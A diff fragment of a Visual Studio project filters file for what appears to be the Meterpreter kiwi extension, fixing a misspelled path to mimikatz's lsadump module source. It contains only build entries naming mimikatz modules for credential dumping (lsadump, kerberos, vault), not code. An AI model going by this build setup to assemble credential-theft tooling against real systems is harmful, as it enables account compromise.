<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.h">
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="..\..\source\extensions\kiwi\mimikatz\mimikatz.rc" />
|
||||
@ -261,9 +261,6 @@
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_process.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos.c">
|
||||
<Filter>modules\kerberos</Filter>
|
||||
</ClCompile>
|
||||
@ -283,6 +280,9 @@
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_vault.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="modules">
|
||||
|